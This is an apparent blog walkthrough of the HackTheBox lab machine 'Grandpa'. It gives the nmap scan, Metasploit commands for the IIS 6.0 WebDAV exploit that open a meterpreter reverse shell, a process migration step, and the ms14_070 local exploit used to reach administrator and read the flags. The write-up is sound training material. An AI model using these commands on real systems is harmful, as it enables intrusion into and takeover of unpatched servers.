Grandpa — HackTheBox
Hello guys, this is a walkthrough for ‘Grandpa’ from ‘hackthebox’.
Whenever I get a machine, I always start with enumerating the target machine using the following ‘nmap’ command:
nmap -sV -O -F — version-light 10.10.10.1 4
Now we know that Microsoft IIS httpd 6.0 is running on port 80. On visiting the website
Hmm…The website looks like it is under construction. I tried using wfuzz, but nothing worked. So, I googled about ‘Microsoft IIS httpd 6.0 exploits’ and got this.
Then, I opened msfconsole and used the following commands
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS 10.10.10.14
set LHOST <Your IP>
run
The module worked and I got a meterpreter shell. However, I couldn’t get anything out of it because the current user didn’t have enough privileges. I tried to escalate, but nothing gave me the permissions.
After a while, I tried to figure out a program that was running as both the superuser and the current user for escalating the privilege. But, luck didn’t favour. On listing all the processes using ‘ps’, I found that some processes were owned by ‘NT AUTHORITY\NETWORK SERVICE’ user and I was running under ‘rundll32.exe’ which had no user ownership. Therefore, I migrated to ‘davcdata.exe’.
After finishing the migration, I thought I’d use ‘post/multi/recon/local_exploit suggester’ to find more exploit about the current session.
I ran the module on session 1 and got 6 exploits. Then, I started trying the third exploit ‘exploit/windows/local/ms14_070_tcpip_ioctl’ and it helped me to elevate the privileges. I used the following commands
use exploit/windows/local/ms14_070_tcpip_ioctl
show options
set session <your session number>
set lhost <your ip>
set lport <your port>
run
I got the user flag from C:\Documents and Settings\Harry\Desktop\user.txt and root flag from C:\Documents and Settings\Administrator\Desktop\root.txt
Thanks for the read.